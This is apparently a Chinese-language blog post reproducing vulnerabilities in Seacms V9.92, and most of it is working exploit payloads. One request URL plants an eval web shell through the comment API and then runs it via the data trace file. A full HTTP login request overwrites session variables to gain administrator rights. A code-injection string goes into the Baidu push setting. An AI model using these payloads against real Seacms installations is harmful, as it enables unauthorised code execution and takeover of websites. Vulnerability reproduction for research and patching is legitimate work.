Seacms V9.92 前台Getshell + 越权

分享 39 字 大概 1 分钟 729 次

2020-06-04 184901.png

复现环境

  • php5.6
  • Seacms V9.92

前台Getshell

/comment/api/index.php?gid=1&page=2&rlist[]=*hex/@eval($_GET[_]);?%3E

2020-06-04 173743.png

/data/mysqli_error_trace.php?_=phpinfo();

2020-06-04 173851.png

越权

  • 注册一个普通用户
  • 登陆的时候抓包
POST /seacms/login.php HTTP/1.1
Host: 192.168.2.1
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.44
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.1/seacms/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=0pq113te1odvj4d7kulrpkphn1
Connection: close
    
dopost=login&userid=test&pwd=test&validate=ltvt&_SESSION[sea_admin_id]=1&_SESSION[sea_ckstr]=ltvt

2020-06-04 182518.png

  • 需要知道后台地址(Emmm...)

2020-06-04 182715.png

  • 4.转到 系统 - 百度推送
";phpinfo();//

2020-06-04 183551.png

文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

发表感想